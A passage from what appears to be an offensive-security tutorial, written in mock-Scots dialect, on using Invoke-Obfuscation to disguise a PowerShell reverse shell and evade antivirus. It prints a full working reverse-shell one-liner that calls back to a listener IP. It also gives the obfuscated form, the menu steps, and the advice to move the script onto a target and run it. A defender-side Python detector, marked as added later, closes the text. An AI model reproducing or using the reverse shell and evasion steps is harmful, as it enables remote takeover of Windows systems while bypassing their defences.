Step 1: Create or develop yer malicious PowerShell script an' save it in a place ye can get at it. For example, here's a basic reverse shell PowerShell script that we'll be obfuscatin':
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPclient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Step 2: Efter ye've created an' saved yer malicious PowerShell script, we'll need tae specify the script path wi' Invoke-Obfuscation. Ye can dae this by runnin' the followin' command in the Invoke-Obfuscation prompt:
SET SCRIPTPATH /PATH-TO-SCRIPT/script.ps1
Efter ye've specified the script path, ye'll be prompted wi' the obfuscation methods menu.
Step 3: Fur this example, we'll be usin' the AST obfuscation method:
AST
Step 4: Aye, noo ye'll be prompted wi' the AST obfuscation options. In this case, we'll be goin' wi' the "ALL" option. This'll gie us the maximum amount o' obfuscation tae really mak' the script a right pain tae unravel:
ALL
Step 5: Noo, ye'll be prompted tae confirm yer obfuscation method. Ye can dae this by runnin' the followin' command:
1
Step 6: Invoke-Obfuscation will noo obfuscate the script an' output the obfuscated PowerShell code, jist like ye can see in the code below:
Set-Variable -Name client -Value (New-Object System.Net.Sockets.TCPclient('192.168.1.1',4444));Set-Variable -Name stream -Value ($client.GetStream());[byte[]]$bytes = 0..65535|%{0};while((Set-Variable -Name i -Value ($stream.Read($bytes, 0, $bytes.Length))) -ne 0){;Set-Variable -Name data -Value ((New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i));Set-Variable -Name sendback -Value (iex $data 2>&1 | Out-String );Set-Variable sendback2 -Value ($sendback + 'PS ' + (pwd).Path + '> ');Set-Variable -Name sendbyte -Value (([text.encoding]::ASCII).GetBytes($sendback2));$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Step 7: Ye can copy the obfuscated PowerShell script an' save it in a new file. Efter that, ye can transfer it ower tae the target Windows system an' rin it.
Rinnin' the script didnae raise ony AV detection or flags, an' we're able tae get a reverse shell connection on oor netcat listener.
We've managed tae obfuscate oor malicious PowerShell script an' evade AV detection. Pure dead brilliant, that is! An' ye ken, ye can also use Invoke-Obfuscation tae obfuscate or encode individual PowerShell commands, if ye fancy giein' that a shot as well. Jist another wee trick up yer sleeve.
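As an added defender-side example (no' from the original post or the Invoke-Obfuscation project), here's a Python check a blue team might run over script block log text: it folds the Step 6 AST rewrite (Set-Variable -Name x -Value ...) back into plain assignments, then scores the normalized text for reverse-shell behaviour rather than spelling. The sample strings and indicator names are constructed for illustration.

```python
import re

# Constructed samples: the AST-obfuscated reverse shell output shown above,
# and a benign one-liner that also uses Set-Variable (should not be flagged).
OBFUSCATED = (
    "Set-Variable -Name client -Value (New-Object System.Net.Sockets.TCPclient('192.168.1.1',4444));"
    "Set-Variable -Name stream -Value ($client.GetStream());[byte[]]$bytes = 0..65535|%{0};"
    "while((Set-Variable -Name i -Value ($stream.Read($bytes, 0, $bytes.Length))) -ne 0){;"
    "Set-Variable -Name data -Value ((New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i));"
    "Set-Variable -Name sendback -Value (iex $data 2>&1 | Out-String );"
    "Set-Variable sendback2 -Value ($sendback + 'PS ' + (pwd).Path + '> ');"
    "Set-Variable -Name sendbyte -Value (([text.encoding]::ASCII).GetBytes($sendback2));"
    "$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
)
BENIGN = "Set-Variable -Name logdir -Value 'C:\\Logs'; Get-ChildItem $logdir | Out-String"

# Set-Variable with or without the explicit -Name switch, followed by -Value.
SET_VAR = re.compile(r"Set-Variable\s+(?:-Name\s+)?(\w+)\s+-Value\s+", re.IGNORECASE)

def normalize(script: str) -> str:
    """Fold the AST rewrite (Set-Variable -Name x -Value (...)) back into
    plain '$x = (...)' so signatures written for the original form match."""
    return SET_VAR.sub(r"$\1 = ", script)

# Behavioural indicators of an interactive reverse-shell loop. Hypothetical
# names; they target what the script does, not how it is spelled.
INDICATORS = {
    "tcp_client": re.compile(r"Net\.Sockets\.TcpClient", re.I),
    "stream_io": re.compile(r"\.GetStream\(\)", re.I),
    "dynamic_eval": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "prompt_echo": re.compile(r"'PS '\s*\+\s*\(pwd\)\.Path", re.I),
    "byte_loop": re.compile(r"\.Read\(\$\w+,\s*0,\s*\$\w+\.Length\)", re.I),
}

def score(script: str) -> dict:
    """Return matched indicators, the Set-Variable count (an unusual density
    of these is itself a tell for AST obfuscation) and a verdict."""
    text = normalize(script)
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return {
        "hits": hits,
        "setvar_count": len(SET_VAR.findall(script)),
        "suspicious": len(hits) >= 3,
    }

if __name__ == "__main__":
    for label, sample in (("obfuscated", OBFUSCATED), ("benign", BENIGN)):
        print(label, score(sample))
```

The point for detection engineering is that the AST rewrite changes variable syntax but not the TcpClient/GetStream/iex/Read loop, so rules keyed on that behaviour survive it.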